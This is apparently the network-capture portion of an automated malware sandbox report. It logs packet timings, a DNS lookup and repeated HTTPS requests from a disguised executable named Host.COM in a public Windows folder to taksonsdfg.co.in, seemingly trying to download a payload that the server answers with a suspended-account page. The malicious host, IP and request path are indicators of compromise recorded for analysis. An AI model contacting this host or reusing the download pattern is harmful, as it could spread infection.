                                                                  Nov 26, 2024 09:39:53.753421068 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:53.753437042 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.081046104 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.081655025 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.081687927 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.082550049 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.082555056 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.697063923 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.697129965 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.697223902 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.697248936 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.701229095 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.701322079 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.701427937 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.701448917 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.701456070 CET50004443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.701461077 CET44350004108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.936079025 CET50009443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.936132908 CET44350009108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.936233044 CET50009443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.948256969 CET50009443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:55.948329926 CET44350009108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:55.948395014 CET50009443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:56.033332109 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:56.033369064 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:56.033452034 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:56.033843994 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:56.033853054 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.361262083 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.361368895 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.434727907 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.434743881 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.435127020 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.436916113 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.479368925 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.853291035 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.853358984 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.853430033 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.853663921 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.853678942 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.853693008 CET50011443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.853699923 CET44350011108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.855027914 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.855062962 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:57.855139971 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.855407953 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:57.855418921 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.230813980 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.231463909 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:59.231482029 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.232429028 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:59.232435942 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.858225107 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.858376980 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.858493090 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:59.858510971 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.862166882 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.862246037 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:59.862358093 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:59.862375021 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:39:59.862406015 CET50015443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:39:59.862413883 CET44350015108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:00.102391958 CET50020443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.102448940 CET44350020108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:00.102524042 CET50020443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.105597973 CET50020443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.105684996 CET44350020108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:00.105748892 CET50020443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.191503048 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.191543102 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:00.191648960 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.191982031 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:00.191992998 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:01.568571091 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:01.568741083 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:01.570110083 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:01.570116043 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:01.570357084 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:01.571613073 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:01.619330883 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:02.076570034 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:02.076653004 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:02.076714039 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:02.076941967 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:02.076957941 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:02.076970100 CET50021443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:02.076976061 CET44350021108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:02.077939987 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:02.077990055 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:02.078057051 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:02.078285933 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:02.078299999 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:03.413857937 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:03.414640903 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:03.414669991 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:03.415761948 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:03.415770054 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.034683943 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.034739017 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.035334110 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.035353899 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.038238049 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.038367033 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.042779922 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.042810917 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.042828083 CET50025443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.042834997 CET44350025108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.266165018 CET50030443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.266186953 CET44350030108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.270272017 CET50030443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.365750074 CET50030443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.365892887 CET44350030108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.365984917 CET50030443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.648308039 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.648343086 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:04.648430109 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.648991108 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:04.649003983 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.068977118 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.069106102 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.070772886 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.070785046 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.071022034 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.072309971 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.115326881 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.579663992 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.579823017 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.579904079 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.580024958 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.580024958 CET50032443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.580044031 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.580048084 CET44350032108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.580956936 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.580990076 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:06.581052065 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.581259012 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:06.581273079 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.002366066 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.003113985 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.003130913 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.004009962 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.004023075 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.674432039 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.722043991 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.722055912 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.769953966 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.794205904 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.794228077 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.794255972 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.794409990 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.794459105 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.794459105 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.884185076 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.884213924 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:08.884247065 CET50037443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:08.884253979 CET44350037108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:09.107073069 CET50043443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.107142925 CET44350043108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:09.107254982 CET50043443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.112833023 CET50043443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.112891912 CET44350043108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:09.112941980 CET50043443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.224670887 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.224709988 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:09.224800110 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.225362062 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:09.225377083 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:10.645215988 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:10.645304918 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:10.648828983 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:10.648838043 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:10.649127007 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:10.650480032 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:10.691325903 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:11.156142950 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:11.156220913 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:11.156312943 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:11.156544924 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:11.156560898 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:11.156575918 CET50044443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:11.156580925 CET44350044108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:11.157530069 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:11.157598019 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:11.157757998 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:11.157922029 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:11.157941103 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:12.531663895 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:12.532490969 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:12.532526016 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:12.533560038 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:12.533565998 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.152015924 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.152061939 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.152149916 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.152179003 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.155432940 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.155495882 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.155553102 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.155570984 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.155595064 CET50049443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.155601025 CET44350049108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.387088060 CET50054443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.387130022 CET44350054108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.387191057 CET50054443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.387572050 CET50054443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:40:13.387641907 CET44350054108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:40:13.387727022 CET50054443192.168.2.7108.170.55.202
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 26, 2024 09:38:11.245034933 CET6132553192.168.2.71.1.1.1
                                                                  Nov 26, 2024 09:38:11.947681904 CET53613251.1.1.1192.168.2.7
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 26, 2024 09:38:11.245034933 CET192.168.2.71.1.1.10x8704Standard query (0)taksonsdfg.co.inA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 26, 2024 09:38:11.947681904 CET1.1.1.1192.168.2.70x8704No error (0)taksonsdfg.co.in108.170.55.202A (IP address)IN (0x0001)false
                                                                  • taksonsdfg.co.in
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.749703108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:13 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:13 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:13 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:13 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.749709108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:15 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:15 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:15 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:15 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:16 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.749716108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:17 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:18 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:17 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:18 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.749722108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:19 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:20 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:20 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
